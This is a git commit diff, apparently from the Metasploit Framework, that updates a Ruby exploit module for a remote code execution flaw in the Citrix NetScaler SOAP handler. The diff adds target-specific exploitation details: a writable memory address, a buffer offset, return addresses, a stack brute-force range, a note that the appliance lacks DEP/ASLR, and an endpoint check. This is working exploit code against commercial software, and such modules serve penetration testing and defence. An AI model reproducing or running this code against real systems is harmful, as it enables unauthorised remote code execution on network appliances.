Update module information

bug/bundler_fix
jvazquez-r7 2014-10-30 20:33:38 -05:00
parent ac939325ce
commit 9404e24b24
1 changed files with 17 additions and 5 deletions


@ -14,10 +14,15 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "Citrix NetScaler Buffer Overflow",
'Name' => "Citrix NetScaler SOAP Handler Remote Code Execution",
'Description' => %q{
This module exploits a buffer overflow vulnerability found in Citrix NetScaler...
The vulnerability exists.... This module has been tested successfully on....
This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.
The vulnerability exists in the SOAP handler, accessible through the web interface. A
malicious SOAP requests can force the handler to connect to a malicious NetScaler config
server. This malicious config server can send a specially crafted response in order to
trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary
code with the privileges of the web server running the SOAP handler. This module has been
tested successfully on the NetScaler Virtual Appliance 450010.
},
'License' => MSF_LICENSE,
'Author' =>
@ -27,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
['URL', 'http://http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
],
'Payload' =>
{
@ -40,11 +45,14 @@ class Metasploit3 < Msf::Exploit::Remote
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'NetScaler Virtual Appliance',
[ 'NetScaler Virtual Appliance 450010',
{
'RwPtr' => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.
'Offset' => 606,
'Ret' => 0xffffda94, # Try before bruteforce...
# The virtual appliance lacks of security mitigations like DEP/ASLR, since the
# process being exploited is an apache child, the bruteforce attack works fine
# here.
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack
@ -84,6 +92,10 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Failure::BadConfig, 'Don\'t use 0.0.0.0 as SRVHOST, use an address on the local machine reachable by the target')
end
if check != Exploit::CheckCode::Detected
fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")
end
start_service
if target.ret